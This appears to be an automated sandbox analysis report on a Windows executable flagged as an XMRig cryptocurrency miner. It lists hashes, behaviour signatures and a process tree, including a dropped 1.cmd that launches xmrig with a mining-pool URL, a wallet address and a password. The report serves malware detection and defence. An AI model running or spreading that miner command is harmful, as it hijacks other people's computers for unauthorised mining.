Analysis

  • max time kernel
    15s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    27/10/2024, 12:30

General

  • Target

    1214286113800f855601b0317bf0bb73044f48606d412f99ca0bf2b4601bff97N.exe

  • Size

    2.4MB

  • MD5

    f7a709560c8c538bf840d38adad98060

  • SHA1

    4396b0b5699837c1fddedb91c832b09a6a9ca2b9

  • SHA256

    1214286113800f855601b0317bf0bb73044f48606d412f99ca0bf2b4601bff97

  • SHA512

    5cec8dc34a2df3d62aa056b1826708d6e1e81d6d87bac2074fdc243e614e191799366e9411f0c7e48e74799131a0eb02916e7b10a5f63a81e0997482c3d1ca99

  • SSDEEP

    49152:nILryvOacuT9fbDxw6++uxp+NqiurJoP6rZ0B1qxtVujoiJ67XoifXUGOOnx:n3zfaJ+uxp+8rZ9t8JQfEQx

Score
10/10

Malware Config

Signatures

  • XMRig Miner payload 2 IoCs
  • Xmrig family
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\1214286113800f855601b0317bf0bb73044f48606d412f99ca0bf2b4601bff97N.exe
    "C:\Users\Admin\AppData\Local\Temp\1214286113800f855601b0317bf0bb73044f48606d412f99ca0bf2b4601bff97N.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2108
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\1.cmd" "
      2⤵
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2704
      • C:\Users\Admin\AppData\Local\Temp\xmrig.exe
        xmrig --url pool.hashvault.pro:80 --user 44nkuDevyMkUnE7Lc4kJThfZqW3zyQ62nZxB9Ca6ikxTK7SMYdLmb9eSdp3PcYDwziHMN1xyq3Yq7BNcbGXDCBhWMzEVEBX --pass UOO
        3⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        PID:1480

Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\1.cmd

          Filesize

          182B

          MD5

          5ee6977e66bcd50d25effdec2d2a23d0

          SHA1

          d6817af66d573ee64e29dec0bc7e47e732b0da3c

          SHA256

          a42894d4886ca4eb3fe3ea985ece123987008b7644ca18fa9837d28e8fbb5488

          SHA512

          30a508e5282aa263f3dafc36a0fcc6675b3105da4e70cfa4176416c893e441695336335d128d680bdee4cbf2b2defe9fdc3adba7116ad0a5631e3433390936f3

        • \Users\Admin\AppData\Local\Temp\xmrig.exe

          Filesize

          6.1MB

          MD5

          5fba8ae226b096da3b31de0e17496735

          SHA1

          d532a01254cf9e0229d3c5803b78ff7c9b0cb8d3

          SHA256

          ca28f4aeaa5e16d216cd828b67454a56f3c7feeb242412d26ed914fadff20d40

          SHA512

          951e44fc0864a6741bcbb4227feb5429a032713dabd91102f4f0e27a69181ce7f23562e902cc09896ae26334b6d18caf0f5a13d81370bd703fd7ed6f78b47e72

        • memory/1480-23-0x0000000000310000-0x0000000000330000-memory.dmp

          Filesize

          128KB